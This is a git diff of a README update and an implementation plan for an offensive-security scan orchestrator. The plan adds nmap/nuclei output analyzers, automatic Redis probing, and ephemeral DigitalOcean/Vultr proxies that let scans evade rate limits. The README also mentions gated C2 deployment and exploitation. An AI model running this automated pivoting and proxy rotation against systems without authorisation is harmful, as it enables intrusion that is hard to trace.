diff --git a/README.md b/README.md index a2a9994..2e895b3 100644 --- a/README.md +++ b/README.md @@ -21,12 +21,12 @@

- Tests + Tests Skills Tools - Lines + Lines Platform - PRs + PRs

--- @@ -321,8 +321,11 @@ Target → TargetDetector → ScanPlanner → ScanEngine → Parsers → Pipelin │ │ │ events │ │ score ``` -- **Executors** — Shell, Docker, MCP server (connection-pooled) +- **Executors** — Shell, Docker, MCP server (connection-pooled), Proxied Shell (ephemeral cloud proxy) - **DAG engine** — dependency-aware task dispatch with reactive edges (one tool's output triggers another) +- **Dynamic mutation** — OutputAnalyzers extract structured intel from tool output, MutationStrategies inject new tasks into the DAG at runtime based on accumulated attack surface state (KillChainState) +- **HITL approval gates** — dangerous tasks (C2 deployment, exploitation) pause for operator approval with configurable timeouts, durable persistence, and write-before-signal crash safety +- **Ephemeral proxy routing** — high-throughput scans route through auto-provisioned cloud nodes (DigitalOcean, Vultr) for rate-limit resilience, with guaranteed teardown - **Normalization** — paths, CWEs, severities, titles standardized across tools - **Deduplication** — strict hash + fuzzy multi-pass matching across tools - **Correlation** — cross-finding relation detection, remediation grouping @@ -384,7 +387,7 @@ A full-stack web interface for multi-user engagement management, built on FastAP /api/v1/exports/ Data export /api/v1/correlation/ Threat correlation /api/v1/chain/ Attack chain analysis -/api/v1/scans/ Scan orchestration (CRUD, control, SSE streaming) +/api/v1/scans/ Scan orchestration (CRUD, control, SSE, approval gates) /api/v1/system/ System info and health ``` @@ -460,11 +463,14 @@ opentools dashboard --engagement my-audit │ │ │ │ ├── engagement/ ── SQLite store (WAL, FTS5, migrations) │ │ ├── scanner/ │ -│ │ ├── engine.py ──── DAG task executor │ +│ │ ├── engine.py ──── DAG task executor + mutation + gates │ │ │ ├── planner.py ── profile → task graph builder │ │ │ ├── pipeline.py ── normalize → dedup → correlate │ │ │ ├── parsing/ ── semgrep, gitleaks, trivy, nmap, 
generic │ -│ │ ├── executor/ ── shell, docker, MCP │ +│ │ ├── executor/ ── shell, docker, MCP, proxied shell │ +│ │ ├── mutation/ ── analyzers, strategies, kill chain state │ +│ │ ├── infra/ ── cloud providers, proxy tunnel, sweeper │ +│ │ ├── approval.py ── HITL gate registry │ │ │ └── store.py ── scan-specific SQLite store │ │ ├── chain/ │ │ │ ├── extractors/ ── regex, parser-aware, LLM │ @@ -670,7 +676,7 @@ python -m pytest tests/ -v ### Project Stats ``` -3 packages | 220+ source files | 1,150+ tests | 30K Python + 1.7K TypeScript | 9 PRs merged +3 packages | 240+ source files | 1,350+ tests | 33K Python + 1.7K TypeScript | 10 PRs merged ``` ### Tech Stack @@ -775,6 +781,20 @@ The parser router auto-discovers parser modules — no registration needed. - [x] Web scan API with SSE streaming - [x] Performance optimization pass — batch DB writes, lazy fetching, reverse indexes, singleton stores +### Phase 3.5: Reactive Engine Expansion + +- [x] Dynamic DAG mutation — OutputAnalyzer → KillChainState → MutationStrategy pipeline +- [x] Nmap and Nuclei output analyzers for structured intel extraction +- [x] RedisProbeStrategy — auto-pivot on discovered Redis services +- [x] Ephemeral proxy routing — CloudNodeProvider ABC with DigitalOcean + Vultr +- [x] Shielded teardown — guaranteed cloud node destruction even under cancellation +- [x] ProxiedShellExecutor — transparent proxy routing for NETWORK_ISOLATED tasks +- [x] Orphan node sweeper for startup cleanup of leaked infrastructure +- [x] HITL approval gates — persistence-first, execution wrapper model +- [x] ApprovalRegistry — in-memory notification hub with database-owned expiry +- [x] FastAPI gate endpoints — list/approve/reject with write-before-signal guarantee +- [x] Command injection guard for strategy-spawned tasks + ### Phase 4 (Planned) - [ ] Attack chain visualization (linked findings → narrative graph) diff --git a/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md 
b/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md new file mode 100644 index 0000000..a3408bc --- /dev/null +++ b/docs/superpowers/plans/2026-04-13-dag-mutation-ephemeral-proxy.md @@ -0,0 +1,2612 @@ +# Dynamic DAG Mutation + Ephemeral Proxy Routing Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Transform OpenTools from a static scan pipeline into a reactive execution engine that mutates its own DAG based on tool output, and optionally routes high-throughput scans through ephemeral proxy infrastructure for rate-limit resilience. + +**Architecture:** Two independent subsystems. Phase A adds a mutation layer (OutputAnalyzer → KillChainState → MutationStrategy) that hooks into the existing `ScanEngine._mark_completed` path — all synchronous within a single event loop turn, so no race conditions. Phase B adds an `AsyncContextManager`-based ephemeral proxy lifecycle that wraps `run_streaming` calls, with shielded teardown guaranteeing cloud node destruction even under cancellation. Both phases compose: a MutationStrategy can spawn tasks with `isolation: network_isolated`, and the ProxiedShellExecutor handles routing transparently. 
+ +**Tech Stack:** Python 3.12+, Pydantic v2, asyncio, httpx (already in deps), pytest + pytest-asyncio + +--- + +## File Structure + +### Phase A — Dynamic DAG Mutation + +| Action | Path | Responsibility | +|--------|------|----------------| +| Create | `packages/cli/src/opentools/scanner/mutation/__init__.py` | Package exports | +| Create | `packages/cli/src/opentools/scanner/mutation/models.py` | `IntelBundle`, `DiscoveredService`, `DiscoveredVuln`, `KillChainState` | +| Create | `packages/cli/src/opentools/scanner/mutation/analyzer.py` | `OutputAnalyzer` protocol + `NmapAnalyzer` + `NucleiAnalyzer` | +| Create | `packages/cli/src/opentools/scanner/mutation/strategy.py` | `MutationStrategy` protocol + `RedisProbeStrategy` + `get_builtin_strategies()` | +| Modify | `packages/cli/src/opentools/scanner/engine.py` | Add mutation fields to `__init__`, hook mutation into `_mark_completed`, harden `_inject_tasks` | +| Create | `packages/cli/tests/test_scanner/test_mutation_models.py` | Tests for models | +| Create | `packages/cli/tests/test_scanner/test_mutation_analyzer.py` | Tests for analyzers | +| Create | `packages/cli/tests/test_scanner/test_mutation_strategy.py` | Tests for strategies | +| Create | `packages/cli/tests/test_scanner/test_engine_mutation.py` | Integration: engine + mutation layer | + +### Phase B — Ephemeral Proxy Routing + +| Action | Path | Responsibility | +|--------|------|----------------| +| Modify | `packages/cli/src/opentools/shared/subprocess.py` | Add `env` parameter to `run_streaming` | +| Create | `packages/cli/src/opentools/scanner/infra/__init__.py` | Package exports | +| Create | `packages/cli/src/opentools/scanner/infra/provider.py` | `CloudNodeProvider` ABC, `EphemeralNode`, `ProvisioningError` | +| Create | `packages/cli/src/opentools/scanner/infra/digitalocean.py` | `DigitalOceanProvider` (httpx-based) | +| Create | `packages/cli/src/opentools/scanner/infra/proxy.py` | `ephemeral_proxy` context manager, `ProxyEndpoint`, 
`_shielded_destroy` | +| Create | `packages/cli/src/opentools/scanner/infra/sweeper.py` | `sweep_orphaned_nodes` startup cleanup | +| Create | `packages/cli/src/opentools/scanner/executor/proxied_shell.py` | `ProxiedShellExecutor` | +| Modify | `packages/cli/src/opentools/scanner/executor/__init__.py` | Export `ProxiedShellExecutor` | +| Modify | `packages/cli/tests/test_scanner/test_shared_subprocess.py` | Add `env` parameter test | +| Create | `packages/cli/tests/test_scanner/test_infra_provider.py` | Tests for provider ABC + DO provider | +| Create | `packages/cli/tests/test_scanner/test_infra_proxy.py` | Tests for proxy context manager + shielded teardown | +| Create | `packages/cli/tests/test_scanner/test_executor_proxied_shell.py` | Tests for proxied executor | + +--- + +## Phase A: Dynamic DAG Mutation + +### Task 1: KillChainState + IntelBundle Models + +**Files:** +- Create: `packages/cli/src/opentools/scanner/mutation/__init__.py` +- Create: `packages/cli/src/opentools/scanner/mutation/models.py` +- Test: `packages/cli/tests/test_scanner/test_mutation_models.py` + +- [ ] **Step 1: Write failing tests for IntelBundle and DiscoveredService** + +```python +# packages/cli/tests/test_scanner/test_mutation_models.py +"""Tests for mutation layer data models.""" + +from opentools.scanner.mutation.models import ( + DiscoveredService, + DiscoveredVuln, + IntelBundle, + KillChainState, +) + + +class TestDiscoveredService: + def test_construction(self): + svc = DiscoveredService( + host="10.0.0.1", + port=6379, + protocol="tcp", + service="redis", + ) + assert svc.host == "10.0.0.1" + assert svc.port == 6379 + assert svc.protocol == "tcp" + assert svc.service == "redis" + assert svc.product is None + assert svc.version is None + + def test_with_product_and_version(self): + svc = DiscoveredService( + host="10.0.0.1", + port=80, + protocol="tcp", + service="http", + product="Apache httpd", + version="2.4.51", + ) + assert svc.product == "Apache httpd" + assert 
svc.version == "2.4.51" + + +class TestDiscoveredVuln: + def test_construction(self): + vuln = DiscoveredVuln( + host="10.0.0.1", + port=443, + template_id="CVE-2021-44228", + severity="critical", + matched_at="https://10.0.0.1:443/api", + extracted_data={"payload": "jndi:ldap"}, + ) + assert vuln.template_id == "CVE-2021-44228" + assert vuln.severity == "critical" + + def test_port_optional(self): + vuln = DiscoveredVuln( + host="10.0.0.1", + port=None, + template_id="exposed-git", + severity="medium", + matched_at="http://10.0.0.1/.git/config", + extracted_data={}, + ) + assert vuln.port is None + + +class TestIntelBundle: + def test_empty_default(self): + bundle = IntelBundle() + assert bundle.services == [] + assert bundle.vulns == [] + assert bundle.urls == [] + assert bundle.metadata == {} + + def test_with_services(self): + svc = DiscoveredService( + host="10.0.0.1", port=22, protocol="tcp", service="ssh", + ) + bundle = IntelBundle(services=[svc]) + assert len(bundle.services) == 1 + assert bundle.services[0].service == "ssh" +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py::TestDiscoveredService -v` +Expected: FAIL with `ModuleNotFoundError: No module named 'opentools.scanner.mutation'` + +- [ ] **Step 3: Implement IntelBundle, DiscoveredService, DiscoveredVuln** + +```python +# packages/cli/src/opentools/scanner/mutation/__init__.py +"""Dynamic DAG mutation layer — output analysis, state accumulation, task synthesis.""" +``` + +```python +# packages/cli/src/opentools/scanner/mutation/models.py +"""Data models for the mutation layer. + +IntelBundle carries structured intelligence extracted from tool output. +KillChainState accumulates intel across all completed tasks, enabling +cross-task reasoning for dynamic task injection. 
+""" + +from __future__ import annotations + +from pydantic import BaseModel, Field + + +class DiscoveredService(BaseModel): + """A network service discovered by a scanning tool.""" + host: str + port: int + protocol: str # "tcp" | "udp" + service: str # e.g., "redis", "http", "ssh" + product: str | None = None # e.g., "Redis", "Apache httpd" + version: str | None = None # e.g., "6.2.7", "2.4.51" + banner: str | None = None + + +class DiscoveredVuln(BaseModel): + """A vulnerability discovered by a scanning tool.""" + host: str + port: int | None + template_id: str # nuclei template ID or CVE + severity: str + matched_at: str # URL or host:port + extracted_data: dict = Field(default_factory=dict) + + +class IntelBundle(BaseModel): + """Structured intelligence extracted from a single task's output. + + Produced by an OutputAnalyzer, consumed by KillChainState.ingest(). + """ + services: list[DiscoveredService] = Field(default_factory=list) + vulns: list[DiscoveredVuln] = Field(default_factory=list) + urls: list[str] = Field(default_factory=list) + metadata: dict = Field(default_factory=dict) + + +class KillChainState(BaseModel): + """Accumulated attack surface knowledge across all completed tasks. + + Only mutated inside ScanEngine._mark_completed (synchronous within + a single event loop turn), so no locking is needed. + """ + services: dict[str, DiscoveredService] = Field(default_factory=dict) + vulns: dict[str, DiscoveredVuln] = Field(default_factory=dict) + urls: set[str] = Field(default_factory=set) + tasks_spawned: dict[str, int] = Field(default_factory=dict) + total_spawned: int = 0 + + def ingest(self, bundle: IntelBundle) -> None: + """Merge an IntelBundle into accumulated state. 
Deduplicates by key.""" + for svc in bundle.services: + key = f"{svc.host}:{svc.port}/{svc.protocol}" + self.services[key] = svc + for vuln in bundle.vulns: + key = f"{vuln.host}:{vuln.template_id}" + self.vulns[key] = vuln + self.urls.update(bundle.urls) + + def has_service(self, service_name: str) -> bool: + """Check if any discovered service matches the given name.""" + return any(s.service == service_name for s in self.services.values()) + + def get_services(self, service_name: str) -> list[DiscoveredService]: + """Return all discovered services matching the given name.""" + return [s for s in self.services.values() if s.service == service_name] + + def record_spawn(self, strategy_name: str, count: int = 1) -> None: + """Record that a strategy spawned tasks.""" + self.tasks_spawned[strategy_name] = ( + self.tasks_spawned.get(strategy_name, 0) + count + ) + self.total_spawned += count +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py::TestDiscoveredService tests/test_scanner/test_mutation_models.py::TestDiscoveredVuln tests/test_scanner/test_mutation_models.py::TestIntelBundle -v` +Expected: All PASS + +- [ ] **Step 5: Write failing tests for KillChainState** + +Add to `packages/cli/tests/test_scanner/test_mutation_models.py`: + +```python +class TestKillChainState: + def test_empty_default(self): + state = KillChainState() + assert state.services == {} + assert state.vulns == {} + assert len(state.urls) == 0 + assert state.total_spawned == 0 + + def test_ingest_services(self): + state = KillChainState() + bundle = IntelBundle(services=[ + DiscoveredService( + host="10.0.0.1", port=6379, protocol="tcp", service="redis", + ), + DiscoveredService( + host="10.0.0.1", port=80, protocol="tcp", service="http", + ), + ]) + state.ingest(bundle) + assert len(state.services) == 2 + assert "10.0.0.1:6379/tcp" in state.services + assert "10.0.0.1:80/tcp" in state.services + + def 
test_ingest_deduplicates(self): + state = KillChainState() + svc = DiscoveredService( + host="10.0.0.1", port=6379, protocol="tcp", service="redis", + ) + state.ingest(IntelBundle(services=[svc])) + state.ingest(IntelBundle(services=[svc])) + assert len(state.services) == 1 + + def test_ingest_vulns(self): + state = KillChainState() + vuln = DiscoveredVuln( + host="10.0.0.1", port=443, template_id="CVE-2021-44228", + severity="critical", matched_at="https://10.0.0.1:443/", + extracted_data={}, + ) + state.ingest(IntelBundle(vulns=[vuln])) + assert "10.0.0.1:CVE-2021-44228" in state.vulns + + def test_ingest_urls(self): + state = KillChainState() + state.ingest(IntelBundle(urls=["http://10.0.0.1/admin"])) + state.ingest(IntelBundle(urls=["http://10.0.0.1/admin", "http://10.0.0.1/api"])) + assert len(state.urls) == 2 + + def test_has_service(self): + state = KillChainState() + state.ingest(IntelBundle(services=[ + DiscoveredService( + host="10.0.0.1", port=6379, protocol="tcp", service="redis", + ), + ])) + assert state.has_service("redis") is True + assert state.has_service("mysql") is False + + def test_get_services(self): + state = KillChainState() + state.ingest(IntelBundle(services=[ + DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"), + DiscoveredService(host="10.0.0.2", port=6379, protocol="tcp", service="redis"), + DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http"), + ])) + redis_services = state.get_services("redis") + assert len(redis_services) == 2 + assert all(s.service == "redis" for s in redis_services) + + def test_record_spawn(self): + state = KillChainState() + state.record_spawn("redis_probe", 2) + assert state.tasks_spawned["redis_probe"] == 2 + assert state.total_spawned == 2 + state.record_spawn("redis_probe", 1) + assert state.tasks_spawned["redis_probe"] == 3 + assert state.total_spawned == 3 +``` + +- [ ] **Step 6: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest 
tests/test_scanner/test_mutation_models.py -v` +Expected: All PASS + +- [ ] **Step 7: Commit** + +```bash +git add packages/cli/src/opentools/scanner/mutation/__init__.py packages/cli/src/opentools/scanner/mutation/models.py packages/cli/tests/test_scanner/test_mutation_models.py +git commit -m "feat(mutation): add IntelBundle, DiscoveredService, KillChainState models" +``` + +--- + +### Task 2: OutputAnalyzer Protocol + NmapAnalyzer + +**Files:** +- Create: `packages/cli/src/opentools/scanner/mutation/analyzer.py` +- Test: `packages/cli/tests/test_scanner/test_mutation_analyzer.py` + +**Context:** The existing `NmapParser` in `packages/cli/src/opentools/scanner/parsing/parsers/nmap.py` converts nmap XML into `RawFinding` objects for the findings pipeline. `NmapAnalyzer` converts the same XML into `DiscoveredService` objects for the mutation layer. Different output, different consumer — but same XML parsing logic. + +- [ ] **Step 1: Write failing tests for NmapAnalyzer** + +```python +# packages/cli/tests/test_scanner/test_mutation_analyzer.py +"""Tests for OutputAnalyzer implementations.""" + +from opentools.scanner.mutation.analyzer import ( + AnalyzerRegistry, + NmapAnalyzer, + NucleiAnalyzer, + OutputAnalyzer, +) +from opentools.scanner.mutation.models import IntelBundle + + +# Minimal valid nmap XML with two open ports +NMAP_XML_TWO_PORTS = """\ +<?xml version="1.0" encoding="UTF-8"?> +<nmaprun> +<host> +<address addr="10.0.0.1" addrtype="ipv4"/> +<ports>
+<port protocol="tcp" portid="6379"> +<state state="open"/> +<service name="redis" product="Redis" version="6.2.7"/> +</port> +<port protocol="tcp" portid="80"> +<state state="open"/> +<service name="http"/> +</port> +<port protocol="tcp" portid="22"> +<state state="closed"/> +<service name="ssh"/> +</port> +</ports> +</host> +</nmaprun> +""" + +NMAP_XML_NO_OPEN = """\ +<?xml version="1.0" encoding="UTF-8"?> +<nmaprun> +<host>
+<address addr="10.0.0.1" addrtype="ipv4"/> +<ports> +<port protocol="tcp" portid="22"> +<state state="closed"/> +</port> +</ports> +</host> +</nmaprun> +""" + +NMAP_XML_MULTI_HOST = """\ +<?xml version="1.0" encoding="UTF-8"?> +<nmaprun> +<host>
+<address addr="10.0.0.1" addrtype="ipv4"/> +<ports> +<port protocol="tcp" portid="6379"> +<state state="open"/> +<service name="redis"/> +</port> +</ports> +</host> +<host> +<address addr="10.0.0.2" addrtype="ipv4"/>
+<ports> +<port protocol="tcp" portid="80"> +<state state="open"/> +<service name="http"/> +</port> +</ports> +</host> +</nmaprun> +""" + + +class TestNmapAnalyzer: + def setup_method(self): + self.analyzer = NmapAnalyzer() + + def test_tool_name(self): + assert self.analyzer.tool == "nmap" + + def test_extracts_open_services(self): + bundle = self.analyzer.analyze(NMAP_XML_TWO_PORTS, "") + assert isinstance(bundle, IntelBundle) + assert len(bundle.services) == 2 + services_by_port = {s.port: s for s in bundle.services} + assert 6379 in services_by_port + assert services_by_port[6379].service == "redis" + assert services_by_port[6379].product == "Redis" + assert services_by_port[6379].version == "6.2.7" + assert services_by_port[6379].host == "10.0.0.1" + assert 80 in services_by_port + assert services_by_port[80].service == "http" + + def test_skips_closed_ports(self): + bundle = self.analyzer.analyze(NMAP_XML_TWO_PORTS, "") + ports = [s.port for s in bundle.services] + assert 22 not in ports + + def test_no_open_ports_returns_empty(self): + bundle = self.analyzer.analyze(NMAP_XML_NO_OPEN, "") + assert bundle.services == [] + + def test_multi_host(self): + bundle = self.analyzer.analyze(NMAP_XML_MULTI_HOST, "") + assert len(bundle.services) == 2 + hosts = {s.host for s in bundle.services} + assert hosts == {"10.0.0.1", "10.0.0.2"} + + def test_invalid_xml_returns_empty(self): + bundle = self.analyzer.analyze("not xml at all", "") + assert bundle.services == [] + + def test_empty_stdout_returns_empty(self): + bundle = self.analyzer.analyze("", "") + assert bundle.services == [] + + +# Minimal nuclei JSON lines output +NUCLEI_JSONL = ( + '{"template-id":"CVE-2021-44228","host":"10.0.0.1","port":"443",' + '"matched-at":"https://10.0.0.1:443/api","info":{"severity":"critical"},' + '"extracted-results":["jndi:ldap"]}\n' + '{"template-id":"exposed-git","host":"10.0.0.1","port":"80",' + '"matched-at":"http://10.0.0.1/.git/config","info":{"severity":"medium"},' + '"extracted-results":[]}\n' +) + + +class TestNucleiAnalyzer: + def setup_method(self): + self.analyzer = NucleiAnalyzer() + 
+ def test_tool_name(self): + assert self.analyzer.tool == "nuclei" + + def test_extracts_vulns(self): + bundle = self.analyzer.analyze(NUCLEI_JSONL, "") + assert len(bundle.vulns) == 2 + template_ids = {v.template_id for v in bundle.vulns} + assert "CVE-2021-44228" in template_ids + assert "exposed-git" in template_ids + + def test_vuln_fields(self): + bundle = self.analyzer.analyze(NUCLEI_JSONL, "") + cve = next(v for v in bundle.vulns if v.template_id == "CVE-2021-44228") + assert cve.host == "10.0.0.1" + assert cve.port == 443 + assert cve.severity == "critical" + assert cve.matched_at == "https://10.0.0.1:443/api" + + def test_extracts_urls_from_matched_at(self): + bundle = self.analyzer.analyze(NUCLEI_JSONL, "") + assert len(bundle.urls) == 2 + + def test_empty_output_returns_empty(self): + bundle = self.analyzer.analyze("", "") + assert bundle.vulns == [] + + def test_invalid_json_lines_skipped(self): + mixed = '{"template-id":"x","host":"h","matched-at":"u","info":{"severity":"low"}}\nnot json\n' + bundle = self.analyzer.analyze(mixed, "") + assert len(bundle.vulns) == 1 + + +class TestAnalyzerRegistry: + def test_register_and_get(self): + registry = AnalyzerRegistry() + analyzer = NmapAnalyzer() + registry.register(analyzer) + assert registry.get("nmap") is analyzer + + def test_get_missing_returns_none(self): + registry = AnalyzerRegistry() + assert registry.get("nonexistent") is None + + def test_get_builtin_analyzers(self): + registry = AnalyzerRegistry() + registry.register_builtins() + assert registry.get("nmap") is not None + assert registry.get("nuclei") is not None +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_analyzer.py::TestNmapAnalyzer::test_tool_name -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement OutputAnalyzer protocol, NmapAnalyzer, NucleiAnalyzer, AnalyzerRegistry** + +```python +# 
packages/cli/src/opentools/scanner/mutation/analyzer.py +"""OutputAnalyzer protocol and builtin implementations. + +OutputAnalyzers extract structured attack surface intelligence from tool +output. They are distinct from ParserPlugin (which produces RawFinding +objects for the findings pipeline) — analyzers produce IntelBundle objects +for the mutation layer's KillChainState. +""" + +from __future__ import annotations + +import json +import xml.etree.ElementTree as ET +from typing import Protocol, runtime_checkable + +from opentools.scanner.mutation.models import ( + DiscoveredService, + DiscoveredVuln, + IntelBundle, +) + + +@runtime_checkable +class OutputAnalyzer(Protocol): + """Extracts attack surface intelligence from raw tool output.""" + tool: str + + def analyze(self, stdout: str, stderr: str) -> IntelBundle: ... + + +class NmapAnalyzer: + """Extract DiscoveredService objects from nmap XML output.""" + tool = "nmap" + + def analyze(self, stdout: str, stderr: str) -> IntelBundle: + if not stdout.strip(): + return IntelBundle() + + try: + root = ET.fromstring(stdout) + except ET.ParseError: + return IntelBundle() + + services: list[DiscoveredService] = [] + + for host in root.findall("host"): + addr_el = host.find("address") + addr = addr_el.get("addr", "unknown") if addr_el is not None else "unknown" + + ports_el = host.find("ports") + if ports_el is None: + continue + + for port in ports_el.findall("port"): + state_el = port.find("state") + if state_el is None or state_el.get("state") != "open": + continue + + svc_el = port.find("service") + services.append(DiscoveredService( + host=addr, + port=int(port.get("portid", "0")), + protocol=port.get("protocol", "tcp"), + service=svc_el.get("name", "") if svc_el is not None else "", + product=svc_el.get("product") if svc_el is not None else None, + version=svc_el.get("version") if svc_el is not None else None, + )) + + return IntelBundle(services=services) + + +class NucleiAnalyzer: + """Extract DiscoveredVuln 
objects from nuclei JSON-lines output.""" + tool = "nuclei" + + def analyze(self, stdout: str, stderr: str) -> IntelBundle: + if not stdout.strip(): + return IntelBundle() + + vulns: list[DiscoveredVuln] = [] + urls: list[str] = [] + + for line in stdout.strip().splitlines(): + line = line.strip() + if not line: + continue + try: + data = json.loads(line) + except json.JSONDecodeError: + continue + + template_id = data.get("template-id", "") + host = data.get("host", "") + matched_at = data.get("matched-at", "") + info = data.get("info", {}) + severity = info.get("severity", "unknown") if isinstance(info, dict) else "unknown" + + port_raw = data.get("port", "") + port: int | None = None + if port_raw: + try: + port = int(port_raw) + except (ValueError, TypeError): + pass + + extracted = data.get("extracted-results", []) + extracted_data = {"results": extracted} if extracted else {} + + vulns.append(DiscoveredVuln( + host=host, + port=port, + template_id=template_id, + severity=severity, + matched_at=matched_at, + extracted_data=extracted_data, + )) + + if matched_at: + urls.append(matched_at) + + return IntelBundle(vulns=vulns, urls=urls) + + +class AnalyzerRegistry: + """Registry of OutputAnalyzer instances, keyed by tool name.""" + + def __init__(self) -> None: + self._analyzers: dict[str, OutputAnalyzer] = {} + + def register(self, analyzer: OutputAnalyzer) -> None: + self._analyzers[analyzer.tool] = analyzer + + def get(self, tool: str) -> OutputAnalyzer | None: + return self._analyzers.get(tool) + + def register_builtins(self) -> None: + """Register all builtin analyzers.""" + self.register(NmapAnalyzer()) + self.register(NucleiAnalyzer()) +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_analyzer.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/scanner/mutation/analyzer.py 
packages/cli/tests/test_scanner/test_mutation_analyzer.py +git commit -m "feat(mutation): add OutputAnalyzer protocol with Nmap and Nuclei analyzers" +``` + +--- + +### Task 3: MutationStrategy Protocol + RedisProbeStrategy + +**Files:** +- Create: `packages/cli/src/opentools/scanner/mutation/strategy.py` +- Test: `packages/cli/tests/test_scanner/test_mutation_strategy.py` + +**Context:** Strategies examine the accumulated `KillChainState` (not just one task's output) and synthesize new `ScanTask` objects. Each strategy is idempotent — it tracks what it has already spawned via task ID conventions to avoid duplicates. + +- [ ] **Step 1: Write failing tests for MutationStrategy and RedisProbeStrategy** + +```python +# packages/cli/tests/test_scanner/test_mutation_strategy.py +"""Tests for MutationStrategy implementations.""" + +from opentools.scanner.mutation.models import ( + DiscoveredService, + IntelBundle, + KillChainState, +) +from opentools.scanner.mutation.strategy import ( + MutationStrategy, + RedisProbeStrategy, + get_builtin_strategies, +) +from opentools.scanner.models import ScanTask, TaskType, ExecutionTier + + +def _make_task( + task_id: str = "nmap-1", + tool: str = "nmap", + scan_id: str = "scan-1", +) -> ScanTask: + return ScanTask( + id=task_id, + scan_id=scan_id, + name=f"{tool}-task", + tool=tool, + task_type=TaskType.SHELL, + ) + + +def _state_with_redis() -> KillChainState: + state = KillChainState() + state.ingest(IntelBundle(services=[ + DiscoveredService( + host="10.0.0.1", port=6379, protocol="tcp", service="redis", + product="Redis", version="6.2.7", + ), + ])) + return state + + +def _state_with_http_only() -> KillChainState: + state = KillChainState() + state.ingest(IntelBundle(services=[ + DiscoveredService( + host="10.0.0.1", port=80, protocol="tcp", service="http", + ), + ])) + return state + + +class TestRedisProbeStrategy: + def setup_method(self): + self.strategy = RedisProbeStrategy() + + def test_name(self): + assert 
self.strategy.name == "redis_probe" + + def test_max_spawns(self): + assert self.strategy.max_spawns == 10 + + def test_spawns_redis_probe_when_redis_discovered(self): + state = _state_with_redis() + task = _make_task(tool="nmap") + new_tasks = self.strategy.evaluate(state, "scan-1", task) + assert len(new_tasks) == 1 + t = new_tasks[0] + assert t.tool == "redis-cli" + assert t.task_type == TaskType.DOCKER_EXEC + assert "10.0.0.1" in t.command + assert "6379" in t.command + assert t.scan_id == "scan-1" + assert t.spawned_by == "nmap-1" + assert "redis" in t.spawned_reason.lower() + + def test_no_spawn_when_no_redis(self): + state = _state_with_http_only() + task = _make_task(tool="nmap") + new_tasks = self.strategy.evaluate(state, "scan-1", task) + assert new_tasks == [] + + def test_no_spawn_when_already_spawned(self): + """Idempotent: evaluate() self-tracks, second call returns empty.""" + state = _state_with_redis() + task = _make_task(tool="nmap") + first = self.strategy.evaluate(state, "scan-1", task) + assert len(first) == 1 + + # Second evaluate on the same strategy instance — should be empty + # because evaluate() marked the service key internally. 
+ second = self.strategy.evaluate(state, "scan-1", task) + assert second == [] + + def test_spawns_for_multiple_redis_instances(self): + state = KillChainState() + state.ingest(IntelBundle(services=[ + DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"), + DiscoveredService(host="10.0.0.2", port=6379, protocol="tcp", service="redis"), + ])) + task = _make_task(tool="nmap") + new_tasks = self.strategy.evaluate(state, "scan-1", task) + assert len(new_tasks) == 2 + hosts = {t.command.split("-h ")[1].split(" ")[0] for t in new_tasks} + assert hosts == {"10.0.0.1", "10.0.0.2"} + + def test_ignores_non_nmap_tool(self): + """Only triggers on nmap/masscan completions.""" + state = _state_with_redis() + task = _make_task(tool="semgrep") + new_tasks = self.strategy.evaluate(state, "scan-1", task) + assert new_tasks == [] + + def test_task_ids_are_deterministic(self): + """Same input produces same task IDs, enabling dedup in _inject_tasks.""" + state = _state_with_redis() + task = _make_task(tool="nmap") + tasks_a = self.strategy.evaluate(state, "scan-1", task) + # Reset strategy state for second evaluation + strategy_b = RedisProbeStrategy() + tasks_b = strategy_b.evaluate(state, "scan-1", task) + assert tasks_a[0].id == tasks_b[0].id + + +class TestGetBuiltinStrategies: + def test_returns_list(self): + strategies = get_builtin_strategies() + assert isinstance(strategies, list) + + def test_contains_redis_probe(self): + strategies = get_builtin_strategies() + names = [s.name for s in strategies] + assert "redis_probe" in names + + def test_all_satisfy_protocol(self): + strategies = get_builtin_strategies() + for s in strategies: + assert isinstance(s, MutationStrategy) +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_strategy.py::TestRedisProbeStrategy::test_name -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement MutationStrategy protocol, 
RedisProbeStrategy, get_builtin_strategies** + +```python +# packages/cli/src/opentools/scanner/mutation/strategy.py +"""MutationStrategy protocol and builtin implementations. + +Strategies evaluate the accumulated KillChainState after each task +completion and synthesize new ScanTask objects for injection into +the DAG. Each strategy tracks what it has already spawned to +maintain idempotency. +""" + +from __future__ import annotations + +from typing import Protocol, runtime_checkable + +from opentools.scanner.models import ( + ExecutionTier, + ScanTask, + TaskType, +) +from opentools.scanner.mutation.models import KillChainState + + +@runtime_checkable +class MutationStrategy(Protocol): + """Evaluates kill chain state and synthesizes new tasks.""" + name: str + max_spawns: int + + def evaluate( + self, + state: KillChainState, + scan_id: str, + completed_task: ScanTask, + ) -> list[ScanTask]: ... + + +class RedisProbeStrategy: + """Spawn redis-cli INFO probes when nmap discovers Redis services. + + Uses DOCKER_EXEC to run redis-cli inside a container, avoiding + the need for redis-cli on the host. + + Self-tracking: marks service keys as spawned inside evaluate(), + so the engine doesn't need to call back. 
